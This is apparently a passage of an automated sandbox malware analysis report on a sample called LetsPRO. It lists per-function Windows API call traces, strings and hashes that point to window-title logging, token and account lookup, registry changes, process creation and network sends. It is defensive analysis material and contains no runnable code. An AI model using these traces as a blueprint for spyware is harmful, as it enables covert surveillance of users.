                                        • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                        • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                        • API String ID: 1254190970-1225219777
                                        • Opcode ID: 0c759a940e7ed84827cf5ae18c3c764c0270157d82fb378bc10ee59ebceb3eb5
                                        • Instruction ID: 20d70b5243350d8a273b9c7ae76ade364fcbcc365fef8550510d1b178a492309
                                        • Opcode Fuzzy Hash: 0c759a940e7ed84827cf5ae18c3c764c0270157d82fb378bc10ee59ebceb3eb5
                                        • Instruction Fuzzy Hash: B66180F1518341AFD760DF65CC80AABB7E9AB8A614F004A1DF6D987240EB34D544CB93
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F35320: InterlockedDecrement.KERNEL32(00000008), ref: 03F3536F
                                          • Part of subcall function 03F35320: SysFreeString.OLEAUT32(00000000), ref: 03F35384
                                          • Part of subcall function 03F35320: SysAllocString.OLEAUT32(03F55148), ref: 03F353D5
                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03F55148,03F369A4,03F55148,00000000,75A773E0), ref: 03F367F4
                                        • GetLastError.KERNEL32 ref: 03F367FE
                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 03F36816
                                        • HeapAlloc.KERNEL32(00000000), ref: 03F3681D
                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 03F3683F
                                        • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03F36871
                                        • GetLastError.KERNEL32 ref: 03F3687B
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 03F368E6
                                        • HeapFree.KERNEL32(00000000), ref: 03F368ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                        • String ID: NONE_MAPPED
                                        • API String ID: 1317816589-2950899194
                                        • Opcode ID: 90b7ce06d0aedb13152cf3727c0cce991765e762d66f66e2b42ba76b0dd73c29
                                        • Instruction ID: b8727355d83f49ce7afabd617aef4bb8da27b590c37237165feab1e2e69a0666
                                        • Opcode Fuzzy Hash: 90b7ce06d0aedb13152cf3727c0cce991765e762d66f66e2b42ba76b0dd73c29
                                        • Instruction Fuzzy Hash: BB4154B5A00319BFD710DB64DD94FEE7779EF8A700F004598E709E6140DA709A858B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 03F3C889
                                        • RegDeleteValueW.ADVAPI32(?), ref: 03F3C894
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3C8A4
                                        • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 03F3C8C3
                                        • lstrlenW.KERNEL32(?), ref: 03F3C8D1
                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03F3C8E4
                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03F3C8F2
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3C900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Close$Value$CreateDeleteOpenlstrlen
                                        • String ID: AppEvents$Network
                                        • API String ID: 3935456190-3733486940
                                        • Opcode ID: cb9ae8b3d240cb7eadbe182da0b66a61a0c026693b7903789cf3b37a802e7299
                                        • Instruction ID: 1737654a2e17b99576d7f5d7ae993397814e887d2963299ac9c9022e27bb7968
                                        • Opcode Fuzzy Hash: cb9ae8b3d240cb7eadbe182da0b66a61a0c026693b7903789cf3b37a802e7299
                                        • Instruction Fuzzy Hash: 01114F76A01208FBE724DAA5ED99FABB76CEB09710F104549FB05A7240DA71AE00D7A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F5A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,EAAB552F,00000000,?,00000000,025F6190,00000000), ref: 025F5A65
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F62F0,00000000), ref: 025F5B04
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B42
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B67
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F6390,00000000), ref: 025F5C5F
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F63A8,00000000), ref: 025F5C80
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B8C
                                          • Part of subcall function 025F1280: __CxxThrowException@8.LIBCMT ref: 025F1290
                                          • Part of subcall function 025F1280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 025F12A1
                                        • InterlockedExchange.KERNEL32(025F61A8,00000000), ref: 025F5CF1
                                        • timeGetTime.WINMM ref: 025F5CF7
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F5D0B
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5D14
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                        • String ID:
                                        • API String ID: 1400036169-0
                                        • Opcode ID: 7f5be0b962ef720a4d27a46de0e214d97385bab001960f377522570953c010fc
                                        • Instruction ID: 951222a5171f4033a28b5b62b1c063de22d0d9708d94ea38d3dc7835e8bfe1cc
                                        • Opcode Fuzzy Hash: 7f5be0b962ef720a4d27a46de0e214d97385bab001960f377522570953c010fc
                                        • Instruction Fuzzy Hash: DEA1F8B0A41A46AFD354DF6AC8C479AFBE8FB08304F90462ED12DC7640D774A964DF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F3E751
                                        • GetForegroundWindow.USER32(?,759223A0,00000000), ref: 03F3E759
                                        • GetWindowTextW.USER32(00000000,03F616F0,00000800), ref: 03F3E76F
                                        • _memset.LIBCMT ref: 03F3E78D
                                        • lstrlenW.KERNEL32(03F616F0,?,?,?,?,759223A0,00000000), ref: 03F3E7AC
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,759223A0,00000000), ref: 03F3E7BD
                                        • wsprintfW.USER32 ref: 03F3E804
                                          • Part of subcall function 03F3E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,03F3E815,?,?,?,?,759223A0,00000000), ref: 03F3E6BD
                                          • Part of subcall function 03F3E6B0: CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03F3E815,?,?,?,?,759223A0,00000000), ref: 03F3E6D7
                                          • Part of subcall function 03F3E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3E6F2
                                          • Part of subcall function 03F3E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 03F3E6FF
                                          • Part of subcall function 03F3E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 03F3E70A
                                          • Part of subcall function 03F3E6B0: CloseHandle.KERNEL32(00000000), ref: 03F3E711
                                          • Part of subcall function 03F3E6B0: ReleaseMutex.KERNEL32(00000000), ref: 03F3E71E
                                        • _memset.LIBCMT ref: 03F3E820
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                        • String ID: [
                                        • API String ID: 2192163267-4056885943
                                        • Opcode ID: 99485593f8b0170d321503e499d4ded5e80b3ed75606f1fdf684151566c61017
                                        • Instruction ID: e2994a6e606417a9f763344f1caa50635e88ce5c5cdb04890aa9813bc508e6e4
                                        • Opcode Fuzzy Hash: 99485593f8b0170d321503e499d4ded5e80b3ed75606f1fdf684151566c61017
                                        • Instruction Fuzzy Hash: F921B579A0021CAAC760EF949C15BBB77BDFF04701F0481A5F945A6144EE71A985CBE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F34F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03F34F63
                                        • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03F34F78
                                        • WSASetLastError.WS2_32(00002746), ref: 03F34F8A
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F34F91
                                        • timeGetTime.WINMM ref: 03F34FBF
                                        • timeGetTime.WINMM ref: 03F34FE7
                                        • SetEvent.KERNEL32(?), ref: 03F35025
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 03F35031
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F35038
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F3504B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                        • String ID:
                                        • API String ID: 1979691958-0
                                        • Opcode ID: 0ba2d581b04d32bbcf0febdcf686a869d151b43ba7cf86e1acd3c5d932fcf309
                                        • Instruction ID: 03b4ef51ff4c01b20b25cf933db614ae8fd3458bc631e1c1a8b05aa8b813d3e9
                                        • Opcode Fuzzy Hash: 0ba2d581b04d32bbcf0febdcf686a869d151b43ba7cf86e1acd3c5d932fcf309
                                        • Instruction Fuzzy Hash: 94410B71A003069FD730EF79D588A7AB7E9FF4A314F0C4A99E94AC7651E336E4408B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F3C2AE
                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 03F3C2CC
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03F3C309
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3C314
                                        • lstrlenW.KERNEL32(?), ref: 03F3C321
                                        • wsprintfW.USER32 ref: 03F3C345
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                        • String ID: %s %s
                                        • API String ID: 1326869720-2939940506
                                        • Opcode ID: 8d84aee0bba9a7f06101509d02bb759b85ad3461e3cc66aec93c8d6df0ca63b5
                                        • Instruction ID: 87d54e7321a9ad5ca3099c4ffa557ee8b7af576906444d07fc33e42c14f32ca2
                                        • Opcode Fuzzy Hash: 8d84aee0bba9a7f06101509d02bb759b85ad3461e3cc66aec93c8d6df0ca63b5
                                        • Instruction Fuzzy Hash: EE318476A403186BDB24EB64DC84FEF7378EB46311F4006A9B606F6180DA71AA44CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 03F3C98D
                                        • _wcsrchr.LIBCMT ref: 03F3C9C7
                                          • Part of subcall function 03F37C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03F37CC3
                                          • Part of subcall function 03F37C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03F37CD7
                                          • Part of subcall function 03F37C80: FreeLibrary.KERNEL32(00000000), ref: 03F37CF7
                                        • GetFileAttributesW.KERNEL32(-00000002), ref: 03F3C9E6
                                        • GetLastError.KERNEL32 ref: 03F3C9F1
                                        • _memset.LIBCMT ref: 03F3CA04
                                        • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03F3CA31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                        • String ID: D$WinSta0\Default
                                        • API String ID: 174883095-1101385590
                                        • Opcode ID: ce1a94b7e94d909c0c179b288371097fd4163c125026d6e54bf23ac10b8d678e
                                        • Instruction ID: a3cbe5c397a492107234bcb915bc075946ffc0a304321102a2db7635fd0f884a
                                        • Opcode Fuzzy Hash: ce1a94b7e94d909c0c179b288371097fd4163c125026d6e54bf23ac10b8d678e
                                        • Instruction Fuzzy Hash: 2911E7B7D0030837DB20E6B89C55FAFBB6D9B46610F040125FB0AEA284EA759905C6A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F38159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                        • lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                        • lstrlenW.KERNEL32(?), ref: 03F381B7
                                        • __wcsnicmp.LIBCMT ref: 03F381CE
                                        • lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        • lstrcpyW.KERNEL32(?,?), ref: 03F38228
                                        • lstrcatW.KERNEL32(?,00000000), ref: 03F38233
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                        • String ID: A:\$B:\
                                        • API String ID: 4249875308-1009255891
                                        • Opcode ID: fed2c51ee9a7354a5e6abd8b4443466e8befe2f82b7e5d4bb337f26988d5e2ca
                                        • Instruction ID: 57c2c628f6283f2965afa9518597a6f3d10ea0ee775153e7b002a84944fea6e2
                                        • Opcode Fuzzy Hash: fed2c51ee9a7354a5e6abd8b4443466e8befe2f82b7e5d4bb337f26988d5e2ca
                                        • Instruction Fuzzy Hash: 12115E71A01219EBDB24EFA0DD54BEEB378EF45310F044598EE0AB7140E774EA09CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F39730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,1A93E2E0,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E,00000000), ref: 03F39773
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E1AE,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39812
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39850
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39875
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F3989A
                                          • Part of subcall function 03F31280: __CxxThrowException@8.LIBCMT ref: 03F31290
                                          • Part of subcall function 03F31280: DeleteCriticalSection.KERNEL32(00000000,03F3D3E6,03F56624,?,?,03F3D3E6,?,?,?,?,03F55A40,00000000), ref: 03F312A1
                                          • Part of subcall function 03F3CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E076,00000000,1A93E2E0,03F3E04E,75922F60,00000000,?,03F3E226,03F5110B,000000FF,?,03F3994A,03F3E226), ref: 03F3CE67
                                          • Part of subcall function 03F3CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E08E,00000000,?,03F3E226,03F5110B,000000FF,?,03F3994A,03F3E226,?,?,?,00000000,03F5125B,000000FF), ref: 03F3CE83
                                        • InterlockedExchange.KERNEL32(03F3E066,00000000), ref: 03F399A0
                                        • timeGetTime.WINMM(?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399A6
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399B4
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F399BD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                        • String ID:
                                        • API String ID: 1400036169-0
                                        • Opcode ID: 48ffba30c4722bb4ceb86b78197256730aef12d0221991834177b9355d6a9611
                                        • Instruction ID: 1d5a55b21d7f2e2cc64c6963b9684b4e1d612722d6dba9c0403dd725fdb84a20
                                        • Opcode Fuzzy Hash: 48ffba30c4722bb4ceb86b78197256730aef12d0221991834177b9355d6a9611
                                        • Instruction Fuzzy Hash: FE81D5B1A05B46BFE344DF7A888479AFBA8FB09304F50462EE12CD7640D774A964CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F4E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetLastError.KERNEL32(0000139F,?), ref: 025F4E79
                                        • RtlTryEnterCriticalSection.NTDLL(?), ref: 025F4E98
                                        • RtlTryEnterCriticalSection.NTDLL(?), ref: 025F4EA2
                                        • SetLastError.KERNEL32(0000139F), ref: 025F4EB9
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 025F4EC2
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 025F4EC9
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeave
                                        • String ID:
                                        • API String ID: 4082018349-0
                                        • Opcode ID: 2ba1e6a00c57339598d53d71e46ee7d3bb1d405935f4d72ebf910e0307c0c968
                                        • Instruction ID: c34e722f4973845d5329614ff6de4270ec04d8ea125edb6aaf874a1525fb4db9
                                        • Opcode Fuzzy Hash: 2ba1e6a00c57339598d53d71e46ee7d3bb1d405935f4d72ebf910e0307c0c968
                                        • Instruction Fuzzy Hash: 3A1186327003048BC720EA79EC84A6FB7ECFB88325B400A2AE746C7540E771D854CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32(1A93E2E0,00000000,00000000,75A773E0,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36938
                                        • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36947
                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F36960
                                        • CloseHandle.KERNEL32(00000000,?,00000000,03F510DB,000000FF,?,03F36AB3,00000000), ref: 03F3696B
                                        • SysStringLen.OLEAUT32(00000000), ref: 03F369BE
                                        • SysStringLen.OLEAUT32(00000000), ref: 03F369CC
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,03F510DB,000000FF), ref: 03F36A2E
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,03F510DB,000000FF), ref: 03F36A34
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandleProcess$OpenString$CurrentToken
                                        • String ID:
                                        • API String ID: 429299433-0
                                        • Opcode ID: 0402eb12b4e7c85be5ea379d88430dc315213038f7d17f35ceee2d1ad931ab9b
                                        • Instruction ID: 60d66a0ba2501b8fd10cebc4091714bfdbad2f0397688bbd872ce548766932c8
                                        • Opcode Fuzzy Hash: 0402eb12b4e7c85be5ea379d88430dc315213038f7d17f35ceee2d1ad931ab9b
                                        • Instruction Fuzzy Hash: DA41A7B6D40219AFDB10EFA9CC80AAEF7F8FB45710F14466AE915F7240D7759900CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F33F65
                                        • SetLastError.KERNEL32(0000139F,?,7591DFA0,03F33648), ref: 03F34054
                                          • Part of subcall function 03F32BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03F32BD6
                                          • Part of subcall function 03F32BC0: SwitchToThread.KERNEL32 ref: 03F32BEA
                                        • send.WS2_32(?,03F549C0,00000010,00000000), ref: 03F33FC6
                                        • SetEvent.KERNEL32(?), ref: 03F33FE9
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F33FF5
                                        • WSACloseEvent.WS2_32(?), ref: 03F34003
                                        • shutdown.WS2_32(?,00000001), ref: 03F3401B
                                        • closesocket.WS2_32(?), ref: 03F34025
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                        • String ID:
                                        • API String ID: 3254528666-0
                                        • Opcode ID: 23869e170015b537dfd4ed626a9ed9680bea6c7f9159060d9c44ea69dc68e7cb
                                        • Instruction ID: c399848401c55218e4ae7b10708825effa8d82f39c7519b87f59ef0493e82dd5
                                        • Opcode Fuzzy Hash: 23869e170015b537dfd4ed626a9ed9680bea6c7f9159060d9c44ea69dc68e7cb
                                        • Instruction Fuzzy Hash: BF215A75600705ABD334EF79D888B9BB7F9BB45711F080E1DE69287A90C7B9E441CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F34060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34074
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34087
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34090
                                        • ResetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34099
                                          • Part of subcall function 03F31350: HeapFree.KERNEL32(?,00000000,?,?,?,03F340A6,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F31390
                                          • Part of subcall function 03F31420: HeapFree.KERNEL32(?,00000000,?,?,?,03F340B1,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F3143D
                                          • Part of subcall function 03F31420: _free.LIBCMT ref: 03F31459
                                        • HeapDestroy.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F340B9
                                        • HeapCreate.KERNEL32(?,?,?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F340D4
                                        • SetEvent.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34150
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,03F34039,?,7591DFA0,03F33648), ref: 03F34157
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                        • String ID:
                                        • API String ID: 1219087420-0
                                        • Opcode ID: 8c100ab3de36ca01f1776945d61b1df906a6dc6065177637c68a10fc55e6d952
                                        • Instruction ID: 557ac9aed69b554eaaf6763e549102ca23adb69502a6707249ceb1f4db550f4e
                                        • Opcode Fuzzy Hash: 8c100ab3de36ca01f1776945d61b1df906a6dc6065177637c68a10fc55e6d952
                                        • Instruction Fuzzy Hash: 74314775200A06AFD705EF39DC98B96F7A8FF49310F048659E5298B250CB35B811CFD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F32140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F31610: __vswprintf.LIBCMT ref: 03F31646
                                        • _malloc.LIBCMT ref: 03F32330
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
